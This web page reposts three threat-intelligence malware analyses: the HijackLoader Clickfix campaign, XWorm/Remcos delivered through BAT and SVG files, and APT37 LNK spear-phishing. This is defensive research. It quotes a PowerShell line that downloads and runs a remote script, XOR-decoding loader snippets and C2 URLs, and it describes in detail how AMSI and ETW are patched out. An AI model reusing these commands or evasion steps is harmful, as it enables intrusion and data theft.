برچسب: Campaign

An Analysis of the Clickfix HijackLoader Phishing Campaign

Table of Contents

- The Evolving Threat of Attack Loaders

Technical Methodology and Analysis

- Initial Access and Social Engineering

- Multi-Stage Obfuscation and De-obfuscation

- Anti-Analysis Techniques

Quick Heal \ Seqrite Protection

Introduction

With the evolution of cyber threats, the final execution of a malicious payload is no longer the sole focus of the cybersecurity industry. Attack loaders have emerged as a critical element of modern attacks, serving as a primary vector for initial access and enabling the covert delivery of sophisticated malware within an organization. Unlike simple payloads, loaders are engineered with a dedicated purpose: to circumvent security defenses, establish persistence, and create a favorable environment for the hidden execution of the final-stage malware. This makes them a more significant and relevant threat that demands focused analysis.

We have recently seen a surge in HijackLoader malware. It first emerged in the second half of 2023 and quickly gained attention due to its ability to deliver payloads and its interesting techniques for loading and executing them. It mostly appears as Malware-as-a-Service, which has been observed mainly in financially motivated campaigns globally.

HijackLoader has been distributed through fake installers, SEO-poisoned websites, malvertising, and pirated software/movie portals, which ensures a wide and opportunistic victim base.

Since June 2025, we have observed attackers using Clickfix where it led unsuspecting victims to download malicious .msi installers that, in turn, resulted in HijackLoader execution. DeerStealer was observed being downloaded as the final executable on the victim’s machine then.

Recently, it has also been observed that TAG-150 has emerged with CastleLoader/CastleBot, while also leveraging external services such as HijackLoader as part of its broader Malware-as-a-Service ecosystem.

HijackLoader frequently delivers stealers and RATs while continuously refining its tradecraft. It is particularly notorious for advanced evasion techniques such as:

Process doppelgänging with transacted sections

Direct syscalls under WOW64

Since its discovery, HijackLoader has continuously evolved, presenting a persistent and rising threat to various industries. Therefore, it is critical for organizations to establish and maintain continuous monitoring for such loaders to mitigate the risk of sophisticated, multi-stage attacks.

Infection Chain

Technical Overview

The initial access starts with a CAPTCHA-based social engineering phishing campaign, which we have identified as Clickfix(This technique was seen to be used by attackers in June 2025 as well).

Fig1: CAPTCHA-Based Phishing Page for Social Engineering

Fig2: HTA Dropper File for Initial Execution

This HTA file serves as the initial downloader, leading to the execution of a PowerShell file.

Upon decoding the above Base64-encoded string, we obtained another PowerShell script, as shown below.

Fig4: First-Stage Obfuscated PowerShell Script

The above decoded PowerShell script is heavily obfuscated, presenting a significant challenge to static analysis and signature-based detection. Instead of using readable strings and variables, it dynamically builds commands and values through complex mathematical operations and the reconstruction of strings from character arrays.

While resolving the above payload, we see it gets decoded into below command, which while still unreadable, can be fully de-obfuscated.

Fig5: Deobfuscation of the First stage obfuscated payload

After full de-obfuscation, we see that the script attempts to connect to a URL to download a subsequent file.

iex ((New-Object System.Net.WebClient).DownloadString(‘https://rs.mezi[.]bet/samie_bower.mp3’))

When run in a debugger, this script returns an error, indicating it is unable to connect to the URL.

Fig6: Debugger View of Failed C2 Connection

The file samie-bower.mp3 is another PowerShell script, which at over 18,000 lines is heavily obfuscated and represents the next stage of the loader.

Fig7: Mainstage PowerShell Loader (samie_bower.mp3)

Through debugging, we observe that this PowerShell file performs numerous Anti-VM checks, including inspecting the number of running processes and making changes to the registry keys.

Fig8: Anti-Virtual Machine and Sandbox Evasion Checks

These checks appear to specifically target and read VirtualBox identifiers to determine if the script is running in a virtualized environment.

While analyzing the script, we observed that the final payload resides within the last few lines, which is where the initial obfuscated loader delivers the final malicious command.

The above gibberish variable declaration has been resolved; upon execution, it performs Base64 decoding, XOR operations, and additional decryption routines, before loading another PowerShell script that likely injects the PE file.

Fig10: Intermediate PowerShell Script for PE Injection

Fig11: Base64-Encoded Embedded PE Payload

Decoding this file reveals an embedded PE file, identifiable by its MZ header.

This PE file is a heavily packed .NET executable.

The executable payload loads a significant amount of code, likely extracted from its resources section.

Fig14: In-Memory Unpacking of the .NET Executable

Once unpacked, the executable payload appears to load a DLL file.

This DLL file is also protected, likely to prevent reverse engineering and analysis.

HijackLoader has a history of using a multi-stage process involving an executable followed by a DLL. This final stage of the loader attempts to connect to a C2 server, from which an infostealer malware is downloaded. In this case, the malware attempts to connect to the URL below.

Fig17: Final C2 Server Connection Attempt

While this C2 is no longer accessible, the connection attempt is consistent with the behavior of NekoStealer Malware. This HijackLoader has been involved in downloading different stealer malware including Lumma as well.

Conclusion

Successfully defending against sophisticated loaders like HijackLoader requires shifting the focus from static, final-stage payloads to their dynamic and continuously evolving delivery mechanisms. By concentrating on detecting the initial access and intermediate stages of obfuscation, organizations can build more resilient defenses against this persistent threat. It is equally important to adopt a proactive approach across all layers, rather than focusing solely on the initial access or the final payload. The intermediate layers are often where attackers introduce the most significant changes to facilitate successful malware deployment.

IOCs:

1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57
37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4
3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df
782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d
921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184
e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82
52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd
c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e
D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4
50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee
hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta
91[.]212[.]166[.]51
37[.]27[.]165[.]65:1477
cosi[.]com[.]ar
hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3
hxxp[:]//77[.]91[.]101[.]66/

Quick Heal \ Seqrite Protection:

Script.Trojan.49900.GC
Loader.StealerDropperCiR
Trojan.InfoStealerCiR
Trojan.Agent
BDS/511

MITRE Att&ck:

Tactic	Technique ID	Technique Name
Initial Access	T1566.002	Phishing: Spearphishing Link (CAPTCHA phishing page)
Initial Access	T1189	Drive-by Compromise (malvertising, SEO poisoning, fake installers)
Execution	T1059.001	Command and Scripting Interpreter: PowerShell
Defense Evasion	T1027	Obfuscated Files or Information (multi-stage obfuscated scripts)
	T1140	Deobfuscate/Decode Files or Information (Base64, XOR decoding)
	T1562.001	Impair Defenses: Disable or Modify Tools (unhooking DLLs)
	T1070.004	Indicator Removal: File Deletion (likely used in staged loaders)
	T1211	Exploitation for Defense Evasion (direct syscalls under WOW64)
	T1036	Masquerading (fake extensions like .mp3 for PowerShell scripts)
Discovery	T1082	System Information Discovery (VM checks, registry queries)
Discovery	T1497.001	Virtualization/Sandbox Evasion: System Checks
Persistence	T1547.001	Boot or Logon Autostart Execution: Registry Run Keys (registry tampering)
Persistence / Privilege Esc.	T1055	Process Injection (PE injection routines)
Command and Control (C2)	T1071.001	Application Layer Protocol: Web Protocols (HTTP/HTTPS C2 traffic)
Command and Control (C2)	T1105	Ingress Tool Transfer (downloading additional payloads)
Impact / Collection	T1056 / T1005	Input Capture / Data from Local System (info-stealer functionality of final payload)

Authors:

Niraj Lazarus Makasare

Shrutirupa Banerjiee

Source link

سپتامبر 12, 2025

Malware Campaign Leverages SVGs, Email Attachments, and CDNs to Drop XWorm and Remcos via BAT Scripts

Table of Content:

Introduction
Infection Chain
Process Tree
Campaign 1:
– Persistence
– BATCH files
– PowerShell script
– Loader
– Xworm/Remcos
Campaign 2
Conclusion
IOCS
Detections
MITRE ATTACK TTPs

Introduction:

Recent threat campaigns have revealed an evolving use of BAT-based loaders to deliver Remote Access Trojans, including XWorm and Remcos. These campaigns often begin with a ZIP archive, typically hosted on trusted looking platforms such as ImgKit, and are designed to appear as legitimate content to entice user interaction.

Upon extraction, the ZIP file contains a highly obfuscated BAT script that serves as the initial stage of the infection chain. These BAT files use advanced techniques to evade static detection and are responsible for executing PowerShell based loaders that inject the RAT payload directly into memory. This approach enables fileless execution, a growing trend in modern malware to bypass endpoint defences.

A notable development in this campaign is the use of SVG files to distribute the malicious BAT scripts. These SVGs contain embedded JavaScript that triggers the execution chain when rendered in vulnerable environments or embedded in phishing pages. This technique highlights a shift toward using non-traditional file formats for malware delivery, exploiting their scripting capabilities to evade detection.

Infection Chain:

Process Tree:

Fig: Process Tree

Campaign 1:

During the analysis Campaign 1, we identified multiple BAT scripts associated with the campaign, indicating an evolving threat landscape. Some of these scripts appear to be in active development, containing partial or test-stage code, while others are fully functional and capable of executing the complete attack chain, including payload download, execution.

The image below showcases two BAT files:

Method 1: Delivered directly as an attachment via EML (email file).
Method 2: Downloaded via a URL hosted on the ImageKit platform.

This variation in delivery methods suggests that the threat actors are experimenting with different approaches to improve infection success rates and evade detection mechanisms.

Persistence:

The malware achieves persistence by creating a BAT file in the Windows Startup folder. This ensures that the malicious script is automatically executed whenever the user starts the system or logs into their account.

BATCH files:

The figure below displays the BAT script in its obfuscated form alongside its de obfuscated version.

Fig: Obfuscated and deobfuscated bat files

PowerShell script:

Below, the figure shows the PowerShell process window and the command-line arguments used during execution. This provides insight into how the malware leverages PowerShell for in-memory payload delivery. We will analyze the PowerShell script in detail in the following sections to understand its role in the deployment of XWorm.

Fig: Process window of PWERSHELL with argument as PS script

Fig: Obfuscated Poershell script as an argument

This PowerShell command runs the script by decoding a Base64 encoded string and executing it in the memory. It uses -nop to avoid loading the user profile, -w hidden to hide the window, and iex (Invoke-Expression) to run the decoded content.

Deobfuscated Script:

We divided the deobfuscated script into two parts. In first part of the PowerShell script; it is designed to locate and execute an obfuscated code embedded within a batch file (aoc.bat) located in the current user’s profile directory. Firstly, It retrieves the username from the environment variables to construct the full path to aoc.bat. It reads all lines using UTF-8 encoding and iterates through each line, specifically looking for lines that begin with a triple-colon comment prefix (:::), followed by a Base64-encoded string. Upon finding such a line, it attempts to decode the Base64 string into a byte array, then converts it into a Unicode string assigned to the variable $ttzhae. This decoded string ($ttzhae) contains an additional layer of PowerShell script, which is then executed in memory using Invoke-Expression. This allows the attacker to embed and execute complex or multi-stage malicious PowerShell logic covertly within a seemingly benign batch file comment, enabling stealthy and fileless execution.

The script programmatically disables two key Windows security mechanisms AMSI (Antimalware Scan Interface) and ETW (Event Tracing for Windows) to evade detection. It leverages .NET reflection and dynamic delegate creation to resolve native functions such as GetProcAddress, GetModuleHandle, VirtualProtect, and AmsiInitialize. Using these, it locates and patches the AmsiScanBuffer function in memory with a instructions (mov eax, 0; ret), effectively bypassing AMSI scanning. Similarly, it disables event tracing by overwriting the beginning of EtwEventWrite with a return instruction. These in-memory modifications allow malicious PowerShell activity to execute stealthily, without being logged or scanned by endpoint protection solutions.

In the second part of the PowerShell script, it first retrieves the current user’s name from the environment and constructs the path to a file named aoc.bat located in the user’s profile directory. It proceeds to execute payloads embedded as encrypted and compressed .NET assemblies hidden within this batch file. The script specifically searches for a comment line prefixed with ::, which contains a Base64-encoded payload string. This string is then split into two parts using the backslash (\) as a delimiter. Each part undergoes Base64 decoding, AES decryption using a hardcoded key and IV (in CBC mode with PKCS7 padding), followed by GZIP decompression as illustrated in the accompanying figures. The result is two separate .NET assemblies, both loaded and executed directly in memory. The first assembly is invoked without any arguments, while the second is executed with ‘%*’ passed as a simulated command-line input.

Fig: Second Part of Script_ encryption function

The second payload plays a more critical role. it functions as a loader responsible for executing the final malware. which is XWorm remote access trojan (RAT).

Fig: Second Part of Script_ call to encryption function

Loader

The loader is designed to evade detection, disable event logging, and execute embedded payloads directly in the memory. It achieves this by either decrypting and running .NET executables via Assembly.Load or executing decrypted shellcode using VirtualProtect and delegates.

Fig: Encrypted Resource containing XWorm/remcos

Loader Capabilities:

Extract and execute embedded payloads

Here, we identified multiple loaders that utilize in-memory execution techniques to evade detection and persist stealthily. Some of these loaders contain encrypted .NET executables, which are decrypted at runtime and executed directly from memory using Assembly.Load followed by .EntryPoint. Invoke, allowing the loader to run managed code without writing the executable to disk.

In contrast, other variants have encrypted shellcode instead of a binary. These variants decrypt the shellcode, modify the memory protections using VirtualProtect to make it executable, and then execute it using a delegate created via Marshal.GetDelegateForFunctionPointer. As shown in below figures,

Xworm

We have previously reported on XWorm and Remcos earlier this year, providing an in-depth analysis of its core functionality, advanced capabilities such as keylogging, remote command execution, data exfiltration, and its methods of persistence and evasion.

In addition to XWorm, several variants in the same campaign also utilized Remcos, a widely known commercial Remote Access Trojan (RAT) that offers a range of capabilities, including remote desktop access, keylogging, command execution, file manipulation, screenshot capture, and data exfiltration.

Campaign 2:

Campaign 2 introduces a notable shift in malware delivery by leveraging SVG (Scalable Vector Graphics) files embedded with JavaScript, which are primarily used in phishing attacks. These malicious SVGs are crafted to appear as legitimate image files and are either rendered in vulnerable software environments (such as outdated image viewers or email clients) or embedded within phishing web pages designed to lure unsuspecting users. Now, the embedded JavaScript within the SVG file acts as a trigger mechanism, initiating the automatic download of a ZIP archive when the SVG is opened or previewed.

This downloaded ZIP archive contains an obfuscated BAT script, which serves as the initial access vector for the malware. Once the BAT script is executed either manually by the user or through social engineering tactics, it initiates a multi-stage infection chain similar to that observed in Campaign 1. Specifically, the BAT script invokes PowerShell commands to decode and execute a loader executable (EXE) directly in memory. This loader is responsible for decrypting and deploying the final payload, which in this campaign is the XWorm Remote Access Trojan (RAT).

The use of SVG as a delivery mechanism represents a noteworthy evolution in attack methodology, as image files are typically considered benign and are often excluded from deep content inspection by traditional security tools. By exploiting the scripting capabilities of SVGs, threat actors can effectively bypass perimeter defences and deliver malicious payloads in a fileless, stealthy manner.

Conclusion:

These campaigns highlight a growing trend in the use of obfuscated scripts, fileless malware, and non-traditional file formats like SVGs to deliver Remote Access Trojans such as XWorm and Remcos. By embedding payloads in BAT files and executing them via PowerShell, attackers effectively bypass static defences. The shift from using SVGs in phishing attacks to malware delivery further emphasizes the need for behavioural detection, content inspection, and improved user awareness to counter such evolving threats.

IOCS:

MD5	File
EDA018A9D51F3B09C20E88A15F630DF5	BAT
23E30938E00F89BF345C9C1E58A6CC1D	JS
1CE36351D7175E9244209AE0D42759D9	LOADER
EC04BC20CA447556C3BDCFCBF6662C60	XWORM
D439CB98CF44D359C6ABCDDDB6E85454	REMCOS

Detections:

Trojan.LoaderCiR

Trojan.GenericFC.S29960909

MITRE ATTACK TTPs:

Tactic	Technique ID & Name	Description
Execution	T1059.001 – Command and Scripting Interpreter: PowerShell	PowerShell is used to interpret commands, decrypt data, and invoke payloads.
	T1106 – Execution Through API	The script uses .NET APIs (e.g., Assembly.Load, Invoke) to execute payloads in memory.
Defense Evasion	T1027 – Obfuscated Files or Information	Payloads are Base64 encoded, AES-encrypted, and compressed to bypass static detections.
	T1140 – Deobfuscate/Decode Files or Information	The script decodes and decompresses payloads before execution.
	T1055.012 – Process Injection: .NET Assembly Injection	Payloads are loaded into memory
	T1036 – Masquerading	The malicious content is hidden in batch file.
Persistence	T1053 – Scheduled Task/Job	Establish persistence through strartup menu.
Initial Access	T1204 – User Execution	Execution depends on a user manually running the batch file
Command and Control	T1132 – Data Encoding	Base64 and encryption are used to encode commands or payloads.
	T1219 – Remote Access Software	Xworm provides full remote access and control over the infected host.
Credential Access	T1056.001 – Input Capture: Keylogging	XWorm includes keylogging functionality to steal user input and credentials.
Exfiltration	T1041 – Exfiltration Over C2 Channel	Stolen data is exfiltrated via the same C2 channel used by Xworm.

Source link

سپتامبر 11, 2025

Operation HanKook Phantom: APT37 Spear-Phishing Campaign

Table of Contents:

Introduction
Threat Profile
Infection Chain
Campaign-1
- Analysis of Decoy:
- Technical Analysis
- Fingerprint of ROKRAT’s Malware
Campaign-2
- Analysis of Decoy
- Technical analysis
- Detailed analysis of Decoded tony31.dat
Conclusion
Seqrite Protections
MITRE Att&ck:
IoCs

Introduction:

Seqrite Lab has uncovered a campaign in which threat actors are leveraging the “국가정보연구회 소식지 (52호)” (National Intelligence Research Society Newsletter – Issue 52) as a decoy document to lure victims. The attackers are distributing this legitimate-looking PDF along with a malicious LNK (Windows shortcut) file named as 국가정보연구회 소식지(52호).pdf .LNK is typically appended to the same archive or disguised as a related file. Once the LNK file is executed, it triggers a payload download or command execution, enabling the attacker to compromise the system.

The primary targets appear to be individuals associated with the National Intelligence Research Association, including academic figures, former government officials, and researchers in the newsletter. The attackers likely aim to steal sensitive information, establish persistence, or conduct espionage.

Threat Profile:

Our investigation has identified the involvement of APT-37, also referred to as InkySquid, ScarCruft, Reaper, Group123, TEMP. Reaper, or Ricochet Chollima. This threat actor is a North Korean state-backed cyber espionage group operational since at least 2012. While their primary focus has been on targets within South Korea, their activities have also reached nations such as Japan, Vietnam, and various countries across Asia and the Middle East. APT-37 is particularly known for executing sophisticated spear-phishing attacks.

Targets below Country:

South Korea
Japan
Vietnam
Russia
Nepal
China
India
Romania
Kuwait
Middle East

APT-37 has been observed targeting North Korea through spear-phishing campaigns using various decoy documents. These include files such as “러시아 전장에 투입된 인민군 장병들에게.hwp” (To North Korean Soldiers Deployed to the Russian Battlefield.hwp), “국가정보와 방첩 원고.lnk” (National Intelligence and Counterintelligence Manuscript.lnk), and the most recent sample, which is analyzed in detail in this report.

Infection Chain:

Campaign –1:

Analysis of Decoy:

The document “국가정보연구회 소식지 (52호)” (“National Intelligence Research Society Newsletter—Issue 52”) is a monthly or periodic internal newsletter issued by a South Korean research group focused on national intelligence, labour relations, security, and energy issues.

The document informs members of upcoming seminars, events, research topics, and organizational updates, including financial contributions and reminders. It reflects ongoing academic and policy-oriented discussions about national security, labour, and North-South Korea relations, considering current events and technological developments like AI.

Threat actors leveraged the decoy document as a delivery mechanism to facilitate targeted attacks, disseminating it to specific authorities as part of a broader spear-phishing campaign. This tactic exploited trust and gained unauthorized access to sensitive systems or information.

Targeted Government Sectors:

National Intelligence Research Association (국가정보연구회)
Kwangwoon University
Korea University
Institute for National Security Strategy
Central Labor Economic Research Institute
Energy Security and Environment Association
Republic of Korea National Salvation Spirit Promotion Association
Yangjihoe (Host of Memorial Conference)
Korea Integration Strategy.

Technical Analysis:

After downloading the LNK file named 국가정보연구회 소식지(52호).pdf.lnk and executing it in our test environment, we observed the following chain of execution using Procmon.

The LNK file contains embedded PowerShell scripts that extract and execute additional payloads at runtime.

This script searches for .lnk files, opens them in binary mode, reads embedded payload data from them, extracts multiple file contents (including a disguised .pdf and additional payloads), writes them to disk (like aio0.dat, aio1.dat, and aio1+.3.b+la+t).

This block reads specific binary chunks from offsets in the .lnk file:

Offset 0x0000102C: likely fake PDF (decoy)
Offset 0x0007EDC1: payload #1 (dat)
Offset 0x0015A851: string (commands/script)
Offset 0x0015AED2: another payload (aio1+3.b+la+t)

It stores them as:

$pdfPath – saved as .pdf decoy
$exePath = dat – possibly loader binary
$executePath = aio1+3.b+la+t – final malicious payload

This executes a batch script (aio03.bat) dropped in the %TEMP% folder.

As per our analysis, the attack starts with a malicious .lnk file containing hidden payloads at specific binary offsets. When executed, PowerShell scans for such .lnk files, extracts a decoy PDF and three embedded payloads (aio1.dat, aio2.dat, and aio1+3.b+la+t), and saves them in %TEMP%. A batch script (aio03.bat) is then executed to trigger the next stage, where PowerShell reads and decodes a UTF-8 encoded script from aio02.dat and runs it in memory using Invoke-Command. This leads to the execution of aio1.dat, the final payload, completing the multi-stage infection chain.

This PowerShell script ai02.dat represents the final in-memory execution stage of the malware chain and is a clear example of fileless execution via PowerShell with reflective DLL injection.

It tries to open the file aio01.dat (previously dropped to %TEMP%) and reads its binary content into $exeFile byte array.

$k=’5′

for ($i=0; $i -lt $len; $i++) {

$newExeFile[$i] = $exeFile[$i] -bxor $k[0]

}

The payload is XOR-encrypted with a single-byte key (0x35, which is ASCII ‘5’). This loop decodes the encrypted binary into $newExeFile.

The aio02.dat file contains a PowerShell script that performs in-memory execution of a final payload (aio01.dat). It reads the XOR-encrypted binary (aio01.dat) from the %TEMP% directory, decrypts it using a single-byte XOR key (0x35), and uses Windows API functions (GlobalAlloc, VirtualProtect, CreateThread, WaitForSingleObject) to allocate memory, make it executable, inject the decoded binary, and execute it—all without dropping another file to disk.

Detailed Analysis of the Extracted EXE file:

Fingerprint of ROKRAT’s Malware

The function is building a host fingerprint string set, containing:

Architecture flag (WOW64 or not)
Computer name
Username
Path to malware binary
BIOS / Manufacturer info

Anti VM

This function often checks whether the system runs in a virtual machine, sandbox, or analysis environment. In our case, it is being used with:

“C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe”

The function sub_40EA2C is likely used as an environment or privilege check. It tries to create and delete a randomly named .dat file in the Windows system directory, which typically requires administrative privileges. If this operation succeeds, it suggests the program is running in a real user environment with sufficient permissions. However, if it fails, it may indicate a restricted environment such as a sandbox or virtual machine used for malware analysis.

Screenshot Capture

The function sub_40E40B appears to capture a screenshot, process the image in memory, and possibly encode or transmit the image data.

ROKRAT Commands

Each command is identified by a single character. Some of the commands take arguments, and they are supplied just after the command ID character. After the correct command is determined, the code parses the statements according to the command type. The following table lists the commands we discovered in ROKRAT, together with their expected arguments and actions:

Command 1 to 4

The shellcode is retrieved from the C2 server and executed via CreateThread. Execution status—either “Success” or “Failed”—is logged to a file named r.txt. In parallel, detailed system information from the victim’s machine is gathered and transmitted back to the command-and-control (C&C) server.

Command 5 to 9

The malware first initializes cloud provider information, which is likely part of setting up communication with the command-and-control (C2) server. It then proceeds to download a PE (Portable Executable) file from the C2 server. The downloaded file is saved with the name KB400928_doc.exe, consistent with the naming convention used in earlier steps. Once the file is saved locally, the malware immediately executes it.

Command C – Exfiltrate Files

Searches for files in the specified file or directory path based on the provided extensions—either all files, common document types (e.g., doc, xls, ppt, txt, m4a, amr, pdf, hwp), or user-defined extensions. The located files are then uploaded to the C&C server.

Command E – Run a Command

Executes the specified command using cmd.exe, allowing remote execution of arbitrary system commands.

Command H – Enumerate Files on Drives

Gathers file and directory information from available drives by executing the command dir /A /S : >> “%temp%\\_.TMP”, which recursively lists all files and folders and stores the output in a temporary file.

Command ‘i’ – Mark Data as Ready for Exfiltration

Collected data is ready to be sent to the command and control (C2) server.

Command ‘j’ or ‘b’ – Terminate Malware Execution

Initiates a shutdown procedure, causing the malware to stop all operations and terminate its process.

C2C connection

RokRat leverages cloud services like pCloud, Yandex, and Dropbox as command and control (C2) channels. it can exfiltrate stolen data, retrieve additional payloads, and execute remote commands with minimal detection.

Provider	Function	Obfuscated URL
Dropbox	list_folder	hxxps://api.dropboxapi[.]com/2/files/list_folder
	upload	hxxps://content.dropboxapi[.]com/2/files/upload
	download	hxxps://content.dropboxapi[.]com/2/files/download
	delete	hxxps://api.dropboxapi[.]com/2/files/delete
pCloud	listfolder	hxxps://api.pcloud[.]com/listfolder?path=%s
	uploadfile	hxxps://api.pcloud[.]com/uploadfile?path=%s&filename=%s&nopartial=1
	getfilelink	hxxps://api.pcloud[.]com/getfilelink?path=%s&forcedownload=1&skipfilename=1
	deletefile	hxxps://api.pcloud[.]com/deletefile?path=%s
Yandex.Disk	list folder (limit)	hxxps://cloud-api.yandex[.]net/v1/disk/resources?path=%s&limit=500
	upload	hxxps://cloud-api.yandex[.]net/v1/disk/resources/upload?path=%s&overwrite=%s
	download	hxxps://cloud-api.yandex[.]net/v1/disk/resources/download?path=%s
	permanently delete	hxxps://cloud-api.yandex[.]net/v1/disk/resources?path=%s&permanently=%s

Campaign –2:

Analysis of Decoy:

Threat Actors are utilizing this document, which is a statement issued by Kim Yō-jong, the Vice Department Director of the Central Committee of the Workers’ Party of Korea (North Korea), dated July 28, and reported by the Korean Central News Agency (KCNA).

This statement marks a sharp and formal rejection by North Korea of any reconciliation efforts from South Korea, particularly under the government of President Lee Jae-myung. It strongly criticizes the South’s attempts to improve inter-Korean relations, labelling them as meaningless or hypocritical, and asserts.

North Korea also expressed no interest in any future dialogue or proposals from South Korea, stating that the country will no longer engage in talks or cooperation.

The statement concluded by reaffirming North Korea’s hostile stance toward South Korea, emphasizing that the era of national unity is over, and future relations will be based on confrontation, not reconciliation.

Targeted Government organization:

South Korean Government (李在明政府 – Lee Jae-myung administration)
Ministry of Unification (統一部)
Workers’ Party of Korea (朝鮮労働党中央委員会)
Korean Central News Agency (KCNA / 朝鮮中央通信)
S.–South Korea Military Alliance (韓米同盟)
Asia-Pacific Economic Cooperation (APEC)

Technical Analysis:

Upon analysing the second LNK file we found while hunting on Virus Total, we observed the same execution chain as previously seen when running the file.

The LNK file drops a decoy document named file.doc and creates the following artifacts in the %TEMP% directory. After dropping these files, the LNK file deletes itself from the parent directory to evade detection and hinder forensic analysis.

As observed in our previous campaign, the same set of files is also being used here. However, this time the files have been renamed—likely to random or arbitrary names—to evade detection or hinder analysis.

Looking into the Bat file,, which is named tony33.bat,

This appears to be highly obfuscated and contains PowerShell execution code. After decoding, the content can be seen in the snapshot below.

The file tony32.dat contains a Base64-encoded PowerShell payload that serves as the core malicious component of the attack. The accompanying .bat/PowerShell loader is designed to read this file from the system’s temporary directory, decode its contents twice—first converting the raw bytes to a UTF-8 string, then Base64-decoding that string back into executable PowerShell code—and finally execute the decoded payload directly in memory. This fileless execution technique allows the attackers to run malicious code without writing the final script to disk, making it harder for traditional security solutions to detect or block the activity.

Upon analysing and decoding the tony32.dat file, we observed that the file has a Base64 encoded string as below,

After decoding the string, we have seen that the file is memory injection loader — it reads an XOR-encrypted binary from tony31.dat, decrypts it, and executes it directly in memory using Windows API calls.

$exePath = $env:temp + ‘\tony31.dat’;

$exeFile = Get-Content -path $exePath -encoding byte;

Loads tony31.dat as raw bytes from the system’s Temp folder.

$xK = ‘7’;

for($i=0; $i -lt $len; $i++) {

$newExeFile[$i] = $exeFile[$i] -bxor $xk[0];

Each byte is XOR-decoded using the key 0x37 (ASCII ‘7’).

$buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100);

$a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old);

Allocates a memory buffer with executable permissions.

dat = Encrypted malicious executable (XOR with ‘7’)
The script decrypts it entirely in memory (no file drop to disk)
Uses direct Windows API calls to allocate and execute memory (fileless execution).

Detailed analysis of Decoded tony31.dat:

Upon analysis of the extracted Exe, we found that this malware acts as a dropper/launcher, downloading a file named abs.tmp in temp directory, and loading ads or drops a file named abs.tmp, and loads its contents.
It then executes the payload through PowerShell and deletes the staging file to cover its tracks.

Data Exfiltration

Malware doesn’t always force its way into systems — sometimes it operates quietly, collecting sensitive data and disappearing without a trace. In this case, two functions, sub_401360 and sub_4021F0, work in tandem to execute a stealthy data exfiltration routine.

The first function scans a specific Temp directory on the victim’s machine (C:\Users\<username>\AppData\Local\Temp\{502C2E2E-…}), identifying all non-directory files. Each discovered file path is then passed to the second function, which opens the file, reads its contents into memory, and packages it into a browser-style multipart/form-data HTTP POST request.

Disguised as a PDF upload, the request includes the victim’s computer name and a timestamp, and is sent to a hardcoded C2 server at:

hxxp://daily.alltop.asia/blog/article/up2.php

Once the file is successfully exfiltrated, it is deleted from the local system, effectively erasing evidence and complicating recovery efforts. This “scan → steal → delete” workflow is designed to be covert — the network traffic mimics a legitimate Chrome file upload, complete with a WebKitFormBoundary string and a fake MIME type (application/pdf) to evade basic content filters.

The stolen files can include cached documents, authentication tokens, downloaded content, or staging files from other malware. To detect such activity, defenders should monitor outbound HTTP POST requests to unfamiliar domains, flag inconsistencies between file extensions and MIME types, and watch for bulk deletions in Temp directories.

Connects to C2C and tries to download payload.

The captured packet confirms what the functions sub_4020D0 and sub_401F80 implement: the malware builds an HTTP GET request to its C2 server at daily.alltop.Asia, targeting /blog/article/d2.php?downfname=<filename>&crc32=<value> where the filename is victim-specific (e.g., abs.tmp) and the CRC value is set to zero, then sends it with realistic browser-like headers including a spoofed Chrome User-Agent, Accept, Language, and Keep-Alive to blend in with normal traffic. This request is sent via WinINet, the response (typically a short command or acknowledgment) is optionally stored in a buffer, the code sleeps briefly, and then a second request is issued to /blog/article/del2.php?delfname=<filename> without reading the reply, effectively telling the server to delete the staged file and reduce evidence. Together, these functions implement a lightweight download-and-cleanup beacon pattern that makes use of a legitimate-looking HTTP session to disguise malicious C2 communication

C2C: hxxp://daily.alltop.asia/blog/article/d2.php?downfname=abs.tmp&crc32=0

After downloading the payload, it tries to save it under a benign filename like `abs.tmp.

Once the file is created, the program opens it using `CreateFileW`, checks its size, and allocates a buffer—rejecting files larger than 128 MB. It then reads the file’s contents into memory.

If the file contains data, it calls `sub_402620`, which likely performs validation or DE-obfuscation—such as checking for magic bytes, verifying a checksum, or decrypting the payload.

Upon successful validation, the program constructs a PowerShell command line. It initializes a `STARTUPINFOA` structure and a zeroed `PROCESS_INFORMATION` structure.

The command line begins with `”powershell “` and appends an encoded or packed payload extracted from the file using `sub_401280(&CommandLine[11], nSize[1], v15, nSize[1])`. This function likely embeds the payload using techniques like Base64 encoding or inline scripting with `-EncodedCommand`.

Finally, the program executes the PowerShell command via `CreateProcessA`, waits for 2 seconds (`Sleep(0x7D0)`), and deletes `abs.tmp` using `DeleteFileW` to clean up traces.

Conclusion:

The analysis of this campaign highlights how APT37 (ScarCruft/InkySquid) continues to employ highly tailored spear-phishing attacks, leveraging malicious LNK loaders, fileless PowerShell execution, and covert exfiltration mechanisms. The attackers specifically target South Korean government sectors, research institutions, and academics with the objective of intelligence gathering and long-term espionage.

We have named this campaign Operation HanKook Phantom for two reasons: the term “HanKook” (한국) directly signifies that Korea in Korea, while “Phantom” represents the stealthy and evasive techniques used throughout the infection chain, including in-memory execution, disguised decoys, and hidden data exfiltration routines. This name reflects both the strategic targeting and the clandestine nature of the operation.

Overall, Operation HanKook Phantom demonstrates the persistent threat posed by North Korean state-sponsored actors, reinforcing the need for proactive monitoring, advanced detection of LNK-based delivery, and vigilance against misuse of cloud services for command-and-control.

Seqrite Protection:

Trojan.49901.GC
trojan.49897.GC

MITRE Att&ck:

Initial Access	T1566.001	Spear phishing Attachment
Execution	T1059.001	Command and Scripting Interpreter: PowerShell
	T1204.001	User Execution: Malicious Link
	T1204.002	User Execution: Malicious File
